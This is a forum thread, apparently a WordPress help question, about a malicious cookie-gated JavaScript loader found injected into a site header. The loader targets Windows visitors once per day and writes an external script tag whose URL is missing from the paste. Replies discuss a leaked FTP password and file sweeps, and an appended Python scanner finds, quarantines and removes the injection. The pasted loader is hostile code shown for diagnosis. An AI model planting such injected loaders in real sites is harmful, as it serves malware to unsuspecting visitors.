I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:

    // Injected script as pasted; the external src URL it writes has been lost from the paste.
    var a = document.cookie;
    // Set a marker cookie "hop" and read it back to confirm cookies work.
    document.cookie = "hop=" + escape("hop") + ";path=/";
    var b = navigator.appVersion, c = " " + document.cookie, d = null, e = 0, f = 0;
    if (c.length > 0) {
      e = c.indexOf(" hop=");
      if (e != -1) {
        e += 5;
        f = c.indexOf(";", e);
        if (f == -1) f = c.length;
        d = unescape(c.substring(e, f));
      }
    }
    // Fire only on Windows browsers and only once per visitor (no "hip" cookie yet).
    if (d == "hop" && b.toLowerCase().indexOf("win") != -1 && a.indexOf("hip") == -1) {
      var g = ["keg", "kei", "ken", "kep", "kev", "kex", "key", "khi", "kid", "kif"],
          h = Math.floor(Math.random() * g.length); // random word, unused in the pasted fragment
      // "hip" cookie expires after 8E7 ms (about 22 hours), so the payload is not re-written until then.
      dt = new Date;
      dt.setTime(dt.getTime() + 8E7);
      document.cookie = "hip=" + escape("hip") + ";expires=" + dt.toGMTString() + ";path=/";
      document.write('<\/script>');
    };

That URL at the end is super suspicious. I googled but found no leads :-(

I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.

Does anyone have any knowledge of this?

A: 

That looks strange to me. Maybe try reinstalling WordPress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the Google Analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer than 8 letters. If your site is infected, take it down from the web NOW until you're sure it's not.

alexy13
All the passwords have been changed to 20 character strings. Said javascript was disabled and site has been deactivated but had trouble finding the root of the problem.
Niels Oeltjen
A: 

Randomly check some of the WordPress install files. My FTP password was leaked. I used my girlfriend's laptop once and saved the password. She must have downloaded some malware that captured the passwords. The result was that JavaScript was injected into pretty much any file with a standard web extension. Then any page you could browse to was attempting to redirect the user to some Russian site. Checking the site in Chrome showed a malware warning. The code I saw was more obfuscated than what you are seeing, but I would check into it. I ended up changing all passwords and running a script to check every file on the server for the footprint I was seeing and remove it. That seems to have worked out for me. If it is too complicated, contact your host and have them look at that account.

spyderman4g63
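The file sweep this answer describes, written out as an added example (it is not the answerer's script and not part of the original thread): a Python scanner that walks a web root, looks in every file with a web extension for the cookie-gate footprint from the snippet in the question (the literal `document.cookie="hop="`), copies each hit into a quarantine directory, and then strips the injected `<script>` block from markup files or the matching line from `.js` files. The web-root layout, the `build_sample_site` sample files, and the choice to match on that one literal are assumptions made for the example.

```python
"""Sweep a web root for an injected JavaScript footprint, quarantine hits, then clean them."""
import re
import shutil
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple

# Extensions the answer describes as hit ("any file with a standard web extension"); assumption.
WEB_EXTENSIONS = {".php", ".html", ".htm", ".js"}

# Literal footprint taken from the snippet in the question. Assumption: the injection is not
# re-obfuscated per file, so this substring is stable across the tree.
MARKER = 'document.cookie="hop="'

# A whole <script>...</script> element. The injected code writes the string '<\/script>'
# (with a backslash), which this pattern does not treat as the closing tag.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def clean_markup(text: str) -> Tuple[str, int]:
    """Remove every <script> element containing MARKER; return (cleaned text, blocks removed)."""
    removed = 0

    def drop_if_injected(match: "re.Match") -> str:
        nonlocal removed
        if MARKER in match.group(0):
            removed += 1
            return ""
        return match.group(0)

    return SCRIPT_RE.sub(drop_if_injected, text), removed


def clean_script_file(text: str) -> Tuple[str, int]:
    """For .js files there is no <script> wrapper: drop each line that contains MARKER."""
    lines = text.splitlines(keepends=True)
    kept = [line for line in lines if MARKER not in line]
    return "".join(kept), len(lines) - len(kept)


def scan_tree(root: Path, quarantine: Optional[Path] = None) -> Dict[str, int]:
    """Return {relative path: injected blocks found}. With a quarantine directory, each hit is
    copied there (preserving its relative path) and the original is rewritten without the
    injection; without one the sweep is report-only."""
    hits: Dict[str, int] = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        text = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaner = clean_script_file if path.suffix.lower() == ".js" else clean_markup
        cleaned, count = cleaner(text)
        if count == 0:
            continue
        rel = path.relative_to(root).as_posix()
        hits[rel] = count
        if quarantine is not None:
            dest = quarantine / rel
            dest.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, dest)  # keep the infected original for analysis
            path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return hits


def build_sample_site(root: Path) -> None:
    """Constructed sample tree (not real site content): two infected files and one clean one."""
    injected = (
        '<script>var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";'
        "document.write('<\\/script>');</script>"
    )
    (root / "wp-content").mkdir()
    (root / "index.php").write_text("<?php get_header(); ?>\n" + injected + "\n<p>hello</p>\n")
    (root / "wp-content" / "theme.js").write_text(
        'console.log("ok");\n' + 'document.cookie="hop="+escape("hop");\n'
    )
    (root / "about.html").write_text("<html><head><script>var x=1;</script></head></html>\n")


def demo() -> Tuple[Dict[str, int], Path, Path]:
    """Build the sample site in a temp directory, sweep it, and return (hits, root, quarantine)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    quarantine = Path(tempfile.mkdtemp(prefix="quarantine-"))
    build_sample_site(root)
    hits = scan_tree(root, quarantine)
    return hits, root, quarantine


if __name__ == "__main__":
    found, site, box = demo()
    for rel_path, n in sorted(found.items()):
        print(f"{rel_path}: {n} injected block(s) removed, original kept in {box / rel_path}")
```

Run it first with `scan_tree(root)` and no quarantine directory to get a report only, and work on a copy of the site rather than the live tree. The quarantined originals are what you examine to find the `src` URL the pasted snippet lost; a reinfection after cleaning means the entry point (in the answer's case, a leaked FTP password) is still open, so the sweep is a cleanup step, not the fix.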